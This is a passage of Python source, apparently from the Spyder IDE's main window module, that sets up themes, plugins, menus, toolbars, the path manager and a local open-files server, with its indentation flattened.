logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'light':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
# Set css_path as a configuration to be used by the plugins
CONF.set('appearance', 'css_path', css_path)
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
# Working directory initialization
CONF.set('workingdir', 'init_workdir', self.init_workdir)
# Load and register internal and external plugins
external_plugins = find_external_plugins()
internal_plugins = find_internal_plugins()
all_plugins = external_plugins.copy()
all_plugins.update(internal_plugins.copy())
# Determine 'enable' config for the plugins that have it
enabled_plugins = {}
for plugin in all_plugins.values():
plugin_name = plugin.NAME
plugin_main_attribute_name = (
self._INTERNAL_PLUGINS_MAPPING[plugin_name]
if plugin_name in self._INTERNAL_PLUGINS_MAPPING
else plugin_name)
try:
if CONF.get(plugin_main_attribute_name, "enable"):
enabled_plugins[plugin_name] = plugin
PLUGIN_REGISTRY.set_plugin_enabled(plugin_name)
except (cp.NoOptionError, cp.NoSectionError):
enabled_plugins[plugin_name] = plugin
PLUGIN_REGISTRY.set_plugin_enabled(plugin_name)
# Instantiate internal Spyder 5 plugins
for plugin_name in internal_plugins:
if plugin_name in enabled_plugins:
PluginClass = internal_plugins[plugin_name]
if issubclass(PluginClass, SpyderPluginV2):
PLUGIN_REGISTRY.register_plugin(self, PluginClass,
external=False)
# Instantiate internal Spyder 4 plugins
for plugin_name in internal_plugins:
if plugin_name in enabled_plugins:
PluginClass = internal_plugins[plugin_name]
if issubclass(PluginClass, SpyderPlugin):
if plugin_name == Plugins.IPythonConsole:
plugin_instance = PLUGIN_REGISTRY.register_plugin(
self, PluginClass, external=False)
plugin_instance.sig_exception_occurred.connect(
self.handle_exception)
else:
plugin_instance = PLUGIN_REGISTRY.register_plugin(
self, PluginClass, external=False)
self.preferences.register_plugin_preferences(
plugin_instance)
# Instantiate external Spyder 5 plugins
for plugin_name in external_plugins:
if plugin_name in enabled_plugins:
PluginClass = external_plugins[plugin_name]
try:
plugin_instance = PLUGIN_REGISTRY.register_plugin(
self, PluginClass, external=True)
# These attributes come from spyder.app.find_plugins to
# add plugins to the dependencies dialog
module = PluginClass._spyder_module_name
package_name = PluginClass._spyder_package_name
version = PluginClass._spyder_version
description = plugin_instance.get_description()
dependencies.add(module, package_name, description,
version, None, kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (PluginClass, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Loading old third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = PLUGIN_REGISTRY.register_plugin(self, mod,
external=True)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'CONFIGWIDGET_CLASS'):
self.preferences.register_plugin_preferences(plugin)
if not hasattr(plugin, 'COMPLETION_PROVIDER_NAME'):
self.thirdparty_plugins.append(plugin)
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# Set window title
self.set_window_title()
# Menus
# TODO: Remove when all menus are migrated to use the Main Menu Plugin
logger.info("Creating Menus...")
from spyder.plugins.mainmenu.api import (
ApplicationMenus, ToolsMenuSections, FileMenuSections)
mainmenu = self.mainmenu
self.edit_menu = mainmenu.get_application_menu("edit_menu")
self.search_menu = mainmenu.get_application_menu("search_menu")
self.source_menu = mainmenu.get_application_menu("source_menu")
self.source_menu.aboutToShow.connect(self.update_source_menu)
self.run_menu = mainmenu.get_application_menu("run_menu")
self.debug_menu = mainmenu.get_application_menu("debug_menu")
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut,
id_='file_switcher')
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut,
id_='symbol_finder')
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions += [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action,
None] + self.editor.edit_menu_actions
switcher_actions = [
self.file_switcher_action,
self.symbol_finder_action
]
for switcher_action in switcher_actions:
mainmenu.add_item_to_application_menu(
switcher_action,
menu_id=ApplicationMenus.File,
section=FileMenuSections.Switcher,
before_section=FileMenuSections.Restart)
self.set_splash("")
# Toolbars
# TODO: Remove after finishing the migration
logger.info("Creating toolbars...")
toolbar = self.toolbar
self.file_toolbar = toolbar.get_application_toolbar("file_toolbar")
self.run_toolbar = toolbar.get_application_toolbar("run_toolbar")
self.debug_toolbar = toolbar.get_application_toolbar("debug_toolbar")
self.main_toolbar = toolbar.get_application_toolbar("main_toolbar")
# Tools + External Tools (some of this depends on the Application
# plugin)
logger.info("Creating Tools menu...")
spyder_path_action = create_action(
self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
id_='spyder_path_action')
from spyder.plugins.application.container import (
ApplicationActions, WinUserEnvDialog)
winenv_action = None
if WinUserEnvDialog:
winenv_action = ApplicationActions.SpyderWindowsEnvVariables
mainmenu.add_item_to_application_menu(
spyder_path_action,
menu_id=ApplicationMenus.Tools,
section=ToolsMenuSections.Tools,
before=winenv_action,
before_section=ToolsMenuSections.External
)
# Main toolbar
from spyder.plugins.toolbar.api import (
ApplicationToolbars, MainToolbarSections)
self.toolbar.add_item_to_application_toolbar(
spyder_path_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.ApplicationSection
)
self.set_splash(_("Setting up main window..."))
# TODO: Migrate to use the MainMenu Plugin instead of list of actions
# Filling out menu/toolbar entries:
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
def __getattr__(self, attr):
"""
Redefinition of __getattr__ to enable access to plugins.
Loaded plugins can be accessed as attributes of the mainwindow
as before, e.g self.console or self.main.console, preserving the
same accessor as before.
"""
# Mapping of new plugin identifiers vs old attributtes
# names given for plugins
if attr in self._INTERNAL_PLUGINS_MAPPING.keys():
return self.get_plugin(self._INTERNAL_PLUGINS_MAPPING[attr])
try:
return self.get_plugin(attr)
except SpyderAPIError:
pass
return super().__getattr__(attr)
def pre_visible_setup(self):
"""
Actions to be performed before the main window is visible.
The actions here are related with setting up the main window.
"""
logger.info("Setting up window...")
for plugin_name in PLUGIN_REGISTRY:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
try:
plugin_instance.before_mainwindow_visible()
except AttributeError:
pass
# Tabify external plugins which were installed after Spyder was
# installed.
# Note: This is only necessary the first time a plugin is loaded.
# Afterwwrds, the plugin placement is recorded on the window hexstate,
# which is loaded by the layouts plugin during the next session.
for plugin_name in PLUGIN_REGISTRY.external_plugins:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
if plugin_instance.get_conf('first_time', True):
self.tabify_plugin(plugin_instance, Plugins.Console)
if self.splash is not None:
self.splash.hide()
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
# Register custom layouts
for plugin_name in PLUGIN_REGISTRY.external_plugins:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
if hasattr(plugin_instance, 'CUSTOM_LAYOUTS'):
if isinstance(plugin_instance.CUSTOM_LAYOUTS, list):
for custom_layout in plugin_instance.CUSTOM_LAYOUTS:
self.layouts.register_layout(
self, custom_layout)
else:
logger.info(
'Unable to load custom layouts for {}. '
'Expecting a list of layout classes but got {}'
.format(plugin_name, plugin_instance.CUSTOM_LAYOUTS)
)
self.layouts.update_layout_menu_actions()
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
def post_visible_setup(self):
"""
Actions to be performed only after the main window's `show` method
is triggered.
"""
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
# Call on_mainwindow_visible for all plugins.
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
try:
plugin.on_mainwindow_visible()
QApplication.processEvents()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Update plugins toggle actions to show the "Switch to" plugin shortcut
self._update_shortcuts_in_panes_menu()
# Load project, if any.
# TODO: Remove this reference to projects once we can send the command
# line options to the plugins.
if self.open_project:
if not running_in_mac_app():
self.projects.open_project(
self.open_project, workdir=self.init_workdir
)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files(close_previous_files=False)
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# To avoid regressions. We shouldn't have loaded the modules
# below at this point.
if DEV is not None:
assert 'pandas' not in sys.modules
assert 'matplotlib' not in sys.modules
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
# TODO: Remove self.projects reference once there's an API for setting
# window title.
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
self.shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Other
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
# This is necessary to avoid an error at startup.
# Fixes spyder-ide/spyder#14901
try:
self.editor.refresh_formatter_name()
except AttributeError:
pass
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.editor:
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def createPopupMenu(self):
return self.application.get_application_context_menu(parent=self)
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.black))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
# Internal plugins
for plugin in (self.widgetlist + self.thirdparty_plugins):
# New API
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError:
pass
# Old API
try:
plugin._close_window()
if not plugin.closing_plugin(cancelable):
return False
except AttributeError:
pass
# New API: External plugins
for plugin_name in PLUGIN_REGISTRY.external_plugins:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
try:
if isinstance(plugin_instance, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError as e:
logger.error(str(e))
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.layouts.save_current_window_settings(prefix)
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
if state:
self.console.redirect_stds()
else:
self.console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
# Check that file exists
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
# Don't open script that starts Spyder at startup.
# Fixes issue spyder-ide/spyder#14483
if sys.platform == 'darwin' and 'bin/spyder' in fname:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
with open(self.SPYDER_PATH, 'r', encoding='utf-8') as f:
path = f.read().splitlines()
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
with open(self.SPYDER_NOT_ACTIVE_PATH, 'r',
encoding='utf-8') as f:
not_active_path = f.read().splitlines()
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
OrderedDict([('/some/path, True), ('/some/other/path, False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
read_only_path = tuple(self.projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
self.project_path = tuple(self.projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
self.preferences.open_dialog(self.prefs_dialog_size)
def set_prefs_size(self, size):
"""Save preferences dialog size."""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
# Note: The +6 pixel on the top makes it look better
# FIXME: Why is this using the toolbars menu? A: To not be on top of
# the toolbars.
# Probably toolbars should be taken into account for this 'delta' only
# when are visible
delta_top = (self.toolbar.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(MainWindow, app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
# This attribute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
if get_debug_level() > 0:
delete_debug_log_files()
setup_logging(options)
# **** Create the application ****
app = create_application()
